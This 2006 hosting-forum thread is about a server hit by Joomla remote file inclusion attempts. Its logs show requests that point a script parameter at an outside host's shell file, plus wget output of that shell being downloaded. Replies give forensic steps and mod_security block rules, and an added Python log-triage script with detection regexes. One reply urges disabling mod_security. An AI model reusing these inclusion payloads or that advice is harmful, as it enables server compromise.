Attacked - Perl processes/Mod_security - Help!

Discussion in 'Security' started by jeroman8, Sep 22, 2006.

  1. jeroman8

    Hi!

    The past 2 days I have had many, many Perl processes running.
    When I can get in to the server load is between 100-150.
    So to be able to work I kill all perl processes.

    I think it's a PHP script being used to run an off-site script.
    My mod_security seems to block a lot of stuff regarding similar stuff, so I wonder if it
    is possible that mod_security will fail if the server is being attacked?

    What is the "libwww-perl/5.805" at the end of the log below?
    It changes version number - like it's trying to find something....

    I found a script in /tmp today, which was not there yesterday, but could not see it
    since my virus program stopped me from reading it.


    72.9.239.178 - - [22/Sep/2006:12:02:57 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
    81.17.45.171 - - [22/Sep/2006:12:03:02 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.69"
    193.198.217.3 - - [22/Sep/2006:12:03:24 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"
    66.36.233.10 - - [22/Sep/2006:12:03:28 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
    62.199.234.50 - - [22/Sep/2006:12:03:29 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"
    70.85.88.196 - - [22/Sep/2006:12:03:43 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
    66.148.74.139 - - [22/Sep/2006:12:04:02 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.79"
     
  2. jeroman8

    Look!

    He managed to save the file to the server somehow!!
    Where the fu... is this file now - can't find it in tmp or the folders on "site" account...

    [Fri Sep 22 12:20:44 2006] [error] SecServerSignature: the existing signature is too short. Please set ServerTokens to Full
    [Fri Sep 22 12:20:44 2006] [error] SecServerSignature: the existing signature is too short. Please set ServerTokens to Full

    [Fri Sep 22 12:20:51 2006] [error] [client 193.198.217.3] File does not exist: /home/site/public_html/403.shtml
    [Fri Sep 22 12:20:53 2006] [error] [client 193.198.217.3] mod_security: Access denied with code 403. Pattern match "(\\\\.\\\\./\\\\.\\\\.|/|(http|https|ftp)\\\\:/)" at ARG("mosConfig_absolute_path") [hostname "www.site.se"] [uri "/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt?"]
    [Fri Sep 22 12:20:53 2006] [error] [client 193.198.217.3] File does not exist: /home/site/public_html/403.shtml
    --12:20:55-- http://www.mr-ylli.com/sh3llx.txt
    => `sh3llx.txt'
    Resolving www.mr-ylli.com... 38.113.1.146
    Connecting to www.mr-ylli.com|38.113.1.146|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 17,114 (17K) [text/plain]

    0K .......... ...... 100% 373.41 KB/s

    12:20:55 (373.41 KB/s) - `sh3llx.txt' saved [17114/17114]
     
    #2 jeroman8, Sep 22, 2006
    Last edited: Sep 22, 2006
  4. randomuser

    /usr/sbin/lsof -p pid

    fail to catch an attack? absolutely. it only blocks what it knows to block.
    everything else will bypass modsec.

    fail to continue to function? no.

    this is the user-agent. look at some other logs to see different
    user-agents (such as MSIE, Firefox, and so on). libwww-perl
    is generally a suspicious user-agent.

    only changes because of a different version, like MSIE 5.0, or MSIE 6.0

    don't use windows to view it then

    these are all 403s.

    http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.4.4

    updatedb && locate sh3llx.txt, or
    find /home -name sh3llx.txt
    (use the manpages)

    also, it may be in /tmp (or /var/tmp, or /dev/shm, depending on
    your permissions and partition setup)


    the pdf explains a DoS situation in BIND, but not arbitrary code execution,
    just a DoS.


    ps aux | grep perl
    /usr/sbin/lsof -p pid

    to see more info on the file.

    who is the user, nobody, or are you using phpsuexec
    and can see the actual user?

    if you see the file in /tmp, do: stat filename
    note the ctime/mtime, grep your domlogs for accesses
    during this time, and find the vulnerable web script that
    is being exploited. it could be anything, possibly something
    with this path:

    /administrator/components/com_comprofiler/plugin.class.php

    or something else.
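As an added example that is not from the thread, here is a small Python triage script following randomuser's steps against the domlog format jeroman8 posted: it parses combined-log lines, flags requests whose query parameter carries a URL scheme or `../..` (the condition mod_security matched in ARG("mosConfig_absolute_path")) or a libwww-perl user-agent, and can restrict the output to a window around the mtime that `stat` reports for a file found in /tmp. The sample log lines, the RFC 5737 addresses and the `attacker.example` host are constructed.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import parse_qsl, urlsplit
# Constructed sample domlog lines (RFC 5737 addresses, placeholder host), same format as the excerpt above.
SAMPLE_LOG = """\
203.0.113.5 - - [22/Sep/2006:12:02:57 +0200] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://attacker.example/shell.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.805"
198.51.100.7 - - [22/Sep/2006:12:03:24 +0200] "GET /index.php?option=com_content&id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1) Firefox/1.5"
192.0.2.9 - - [22/Sep/2006:12:31:10 +0200] "GET /download.php?file=../../../../etc/passwd HTTP/1.0" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
"""
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)
# Same condition the thread's mod_security rule fired on: a URL scheme or ../.. inside a parameter value.
RFI_RE = re.compile(r'(\.\./\.\.|(http|https|ftp):/)', re.I)

def parse_ts(s):
    # Apache timestamp such as 22/Sep/2006:12:02:57 +0200 -> timezone-aware datetime
    return datetime.strptime(s, "%d/%b/%Y:%H:%M:%S %z")

def parse_line(line):
    """Fields of one combined-log line, or None if the line does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = parse_ts(rec["ts"])
    rec["status"] = int(rec["status"])
    return rec

def flag(rec):
    """Reasons this request deserves a look; an empty list means nothing notable."""
    reasons = []
    if "libwww-perl" in rec["ua"].lower():
        reasons.append("libwww-perl user-agent")
    for k, v in parse_qsl(urlsplit(rec["target"]).query, keep_blank_values=True):
        if RFI_RE.search(v):
            reasons.append(f"URL/traversal in {k}={v}")
    return reasons

def triage(log_text, when=None, minutes=5):
    """Flagged requests as (ip, status, reasons); with `when` set (e.g. the mtime
    stat reports for a file found in /tmp) only those within +/- minutes of it."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or (when is not None and abs(rec["ts"] - when) > timedelta(minutes=minutes)):
            continue
        if reasons := flag(rec):
            hits.append((rec["ip"], rec["status"], reasons))
    return hits
```

Run it over a real domlog with `triage(open(path).read(), parse_ts("22/Sep/2006:12:20:44 +0200"))`, substituting the time from `stat` on the suspect file, to narrow down which script was hit in that window.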
     
  5. ramprage

    That's an ancient Joomla hole, not a hole in named. Unless they're trying to run some kind of exploit through Joomla to further exploit the server.

    Mod_security should easily stop these requests. Is it not for you? If not you need a new ruleset.
     
  6. jeroman8

    Thanks randomuser, I will check all this out.

    Mod_sec is installed and blocking 99% of all attacks.
    Obviously not all of them - I use 98% of hostmerits rules.
     
  7. ramprage

    Which ones isn't it blocking? I can write some rules for ya
     
  8. jeroman8

    This seems to block all of this:
    SecFilterSelective HTTP_USER_AGENT "libwww-perl"

    Hopefully there are no valid user agents named libwww-perl!?
     
  9. hostww


    It does block something that might be useful to customers...

    Requesting IP Date Time Handler GET Host Mod_Security-Message Mod_Security-Action
    65.61.156.43 2006-10-09 23:00:57 / HTTP/1.0 www.domain.com Access denied with code 403. Pattern match "libwww-perl" at HEADER("USER-AGENT") 403

    [11:42pm] [N] Resolved server3.web-stat.com -> 65.61.156.43
     
  10. student

    After applying this to mod_security, entries such as:
    "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.mr-ylli.com/sh3llxs.txt? HTTP/1.1" 403 - "-" "libwww-perl/5.803"

    are still appearing in the httpd log, is it normal? In the mod_security log I see that this connection is blocked, but if so, then how is it logged by Apache? Shouldn't it be blocked first, even before Apache can log this?

    Ok, but speaking about mod_security rules, is it possible to filter the data link layer of all packets that are going through httpd? I'm wondering how to block every packet that contains the "#!/" string. Can mod_security do this?
     
  11. jeroman8

    Yes, it still logs the entry even if it is blocked.
    They have access to the URL, but instead of being delivered a 200 OK and getting the page, they get the action 403 Forbidden and do not get the page requested.

    You can probably do anything you like.

    If you have not already - check out the host merit rules.
    Do a search here for "host merit" "mod_security"
     
  12. ramprage

    You may set certain rules to nolog,allow if you want to not log them and bypass that rule.
     
  13. randomuser

    The default log is a 406, not a 403, and logs to /usr/local/apache/logs/audit_log vice the domlog (edit: my apologies - it does in fact log to both places). From /usr/local/apache/conf/modsec.conf:

    If you added the user agent rule to modsec.conf, it may have been overwritten by cPanel. All rules should be placed in modsec.user.conf at all times.

    If you placed the rule in either modsec.conf or modsec.user.conf, you need to restart httpd for the new rule to work.
     
    #13 randomuser, Oct 13, 2006
    Last edited: Oct 14, 2006
  14. meweb

    Just make sure to add the following lines in the .htaccess file under your public_html directory, restart Apache and see the result.

    ##################
    SecFilterEngine Off
    SecFilterScanPOST Off
    ##################
     